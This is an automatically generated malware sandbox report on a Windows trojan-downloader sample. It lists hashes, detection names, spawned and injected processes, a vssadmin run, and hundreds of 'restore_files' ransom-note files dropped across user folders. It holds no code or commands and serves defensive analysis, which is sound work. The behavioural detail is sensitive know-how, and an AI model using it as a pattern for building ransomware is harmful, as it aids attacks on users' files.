Skip to main content

Trojan.Generic.14940836_52b828a3d2


Trojan-Downloader.Win32.Upatre.epwd (Kaspersky), Trojan.Generic.14940836 (B) (Emsisoft), Trojan.Generic.14940836 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 52b828a3d2c1058ab80feed23e7e81ba

SHA1: 897366ba9e87e5145db102a7e4f8366f84bcb621

SHA256: 553429c750d6e5b880a392a6e2543cfc6fc9f542b7d17ff5931ace3503384e64

SSDeep: 3072:oUcCifHkS7ZRIWmibtel zzvcFA4u2WXuku8ukyIY:rf6ZRYibwS7ci4u2WXuku8ukRY

Size: 176128 bytes

File type: EXE

Platform: WIN32

Entropy: Not Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2015-08-29 12:22:18

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

bhtydrhbtr.exe:1252
%original file name%.exe:396
vssadmin.exe:1244
bryehretgw.exe:1160

The Trojan injects its code into the following process(es):

vcwuwa.exe:1980
bryehretgw.exe:1900

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process bhtydrhbtr.exe:1252 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\vcwuwa.exe (2105 bytes)

The process %original file name%.exe:396 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\bgdfcffc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bhtyhtvfse.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vgregwr.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1[1].htm (649720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2[1].htm (129192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bryehretgw.exe (129490 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bhtydrhbtr.exe (650032 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bttrbyerfd.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dwtetevf.exe (0 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\bgdfcffc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bhtyhtvfse.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vgregwr.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bttrbyerfd.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dwtetevf.exe (0 bytes)

The process vcwuwa.exe:1980 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\18\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\30\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\43\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\39\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Local Settings\History\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\AssetCache\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Music\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\45\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\52\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\restore_files_fyiyk.html (5 bytes)
C:\totalcmd\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\55\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\26\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ActivePerl 5.16.2 Build 1602\restore_files_fyiyk.html (5 bytes)
C:\totalcmd\LANGUAGE\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\10\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\16\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\26\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\16\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\18\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\58\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\PrintHood\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\AssetCache\E7VJ4HGS\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\GHISLER\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\UserData\4XCFALMJ\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\49\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\21\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\NetHood\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\MMC\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\22\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Windows\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\42\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Identities\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\62\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\1\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\jre1.6.0_18\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\11\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\muffin\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\61\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\27\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temp\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\35\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\History\History.IE5\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\13\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\PrintHood\restore_files_fyiyk.txt (2 bytes)
C:\totalcmd\NO.BAR (892 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\59\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\UserData\YJM90VAL\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\11\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Templates\quattro.wb2 (430 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\54\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Wireshark\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Recent\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\10\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\37\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\63\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\55\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Protect\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\52\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows Media\9.0\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\31\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\My Documents\My Pictures\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\45\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Accessibility\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\40\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\55\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temp\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (13880 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\32\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Color\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Templates\wordpfct.wpd (892 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Templates\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Accessibility\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\47\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\47\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temp\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Templates\winword.doc (426 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\47\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\29\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\58\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Entertainment\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\7\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\24\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.settings.js (860 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\VMware\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Entertainment\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Media Player\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\17\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\36\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Templates\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\tmp\si\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\50\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\NetHood\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\My Documents\My Music\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\39\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\54\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\12\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\1\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ActivePerl 5.16.2 Build 1602\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\21\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\25\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Media Player\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\GHISLER\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\54\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\17\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\AU\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\GHISLER\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\6\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\63\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Games\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temp\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
C:\totalcmd\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\S-1-5-19\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\S-1-5-20\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Start Menu\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Accessibility\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\tmp\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\44\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\40\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\History\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\11\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Communications\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\9\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\Winter.jpg (1225 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\VMware\VMware Tools\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Cookies\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\26\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\7\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\61\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Communications\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.html (5 bytes)
C:\totalcmd\KEYBOARD.TXT (436 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\22\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Templates\excel4.xls (419 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\25\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\31\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\3\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\kiks.yandex.ru\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Recent\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\SendTo\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Documents\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\62\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Favorites\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\VMware\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\History\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\SendTo\restore_files_fyiyk.html (5 bytes)
